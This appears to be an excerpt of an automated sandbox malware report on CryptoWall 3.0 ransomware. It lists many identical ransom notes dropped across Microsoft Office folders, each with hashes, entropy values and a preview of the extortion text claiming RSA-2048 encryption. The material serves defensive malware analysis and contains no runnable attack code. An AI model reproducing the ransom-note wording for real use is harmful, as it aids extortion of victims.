                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\1036\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\3082\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\3082\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\ACCWIZ\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\ACCWIZ\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\ADDINS\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\ADDINS\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\AccessWeb\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\AccessWeb\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\BORDERS\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\BORDERS\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Bibliography\Style\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Bibliography\Style\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Bibliography\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
